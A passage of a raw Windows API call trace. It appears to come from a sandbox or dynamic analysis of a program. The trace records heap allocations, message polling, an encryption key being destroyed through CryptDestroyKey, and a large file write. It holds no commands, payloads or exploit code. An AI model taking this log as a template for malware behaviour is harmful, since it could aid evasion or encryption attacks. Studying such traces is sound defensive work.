1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0234.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0234.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2648) returned 0x2f1bb08 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f194b8 | out: hHeap=0x970000) returned 1 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0234.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0234.750] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0234.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.750] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0234.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.750] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0234.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0234.752] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0234.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0234.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0234.752] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0234.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0234.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0234.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0234.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0234.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0234.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0234.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0234.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2648) returned 0x2f194b8 [0234.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2648) returned 0x2f1e158 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f194b8 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2648) returned 0x2f194b8 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1e158 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2648) returned 0x2f1e158 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f194b8 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0234.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0234.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0234.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0234.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0234.760] WriteFile (in: hFile=0x2d0, lpBuffer=0x3bf3428*, nNumberOfBytesToWrite=0x2648, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf3428*, lpNumberOfBytesWritten=0x8cf5e4*=0x2648, lpOverlapped=0x0) returned 1 [0234.762] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0234.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0234.763] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0234.763] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.763] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.763] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0234.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0234.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0234.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.764] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0234.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.764] CryptDestroyKey (hKey=0xa87250) returned 1 [0234.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0234.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0234.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0234.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0234.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0234.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0234.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0234.766] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0234.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) 